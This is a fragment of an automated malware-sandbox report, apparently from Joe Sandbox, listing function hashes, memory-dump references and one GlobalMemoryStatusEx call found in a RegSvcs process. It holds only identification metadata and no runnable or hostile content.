                                        • Opcode Fuzzy Hash: 86c60337bbb4c4d41486aaab9a29e13f89055de3e0b1672c14831f2c112028ea
                                        • Instruction Fuzzy Hash: 0E1133B1C006599BDB10CF9AC844B9EFBF4BF48220F11816AD818AB240D378A940CFE1
                                        Function 015E82F8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 31 15e82f8-15e833e 32 15e8346-15e8374 GlobalMemoryStatusEx 31->32 33 15e837d-15e83a5 32->33 34 15e8376-15e837c 32->34 34->33
                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,015E827A), ref: 015E8367
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        • Opcode ID: 3518d784e08d842cc9bec7c6bb5c75997744ba41c0a6f5412bcd64fb1cffa5ed
                                        • Instruction ID: c0ed253a6c822d57097c10071c3f82cbb15a539cf5d7119c3a74b53c27fd9a11
                                        • Opcode Fuzzy Hash: 3518d784e08d842cc9bec7c6bb5c75997744ba41c0a6f5412bcd64fb1cffa5ed
                                        • Instruction Fuzzy Hash: A91126B6C00659DFDB10CFAAC5457DEFBF4BF08220F15856AD858AB240D378AA44CFA1

                                        Non-executed Functions

                                        Function 015E0FA0 Relevance: .3, Instructions: 260COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c755fae98118ef718cb6572ee1a1a43af758cd5ddbe97cff283c5f39e0492d8
                                        • Instruction ID: fd261e3666d04a7975ad94d13b8e7f5c006b967c7268979aa9ee65a7881677c8
                                        • Opcode Fuzzy Hash: 7c755fae98118ef718cb6572ee1a1a43af758cd5ddbe97cff283c5f39e0492d8
                                        • Instruction Fuzzy Hash: C6819274F002199BDB1CDFB5889837E77F7BFC8610B058969E456EB388CE3498059B92
                                        Function 015E5880 Relevance: .2, Instructions: 238COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 786722e423d524068726b33018f5175dd924e2599999181f08a1312c8115271c
                                        • Instruction ID: 07d36d8f765a8ef4334b79954a556fb00c9682101a7459e8d1b23692ff51a660
                                        • Opcode Fuzzy Hash: 786722e423d524068726b33018f5175dd924e2599999181f08a1312c8115271c
                                        • Instruction Fuzzy Hash: 3D913974E103098FDF18CFA9C9897EEBBF2BF88318F148529D415AB254EB749845CB91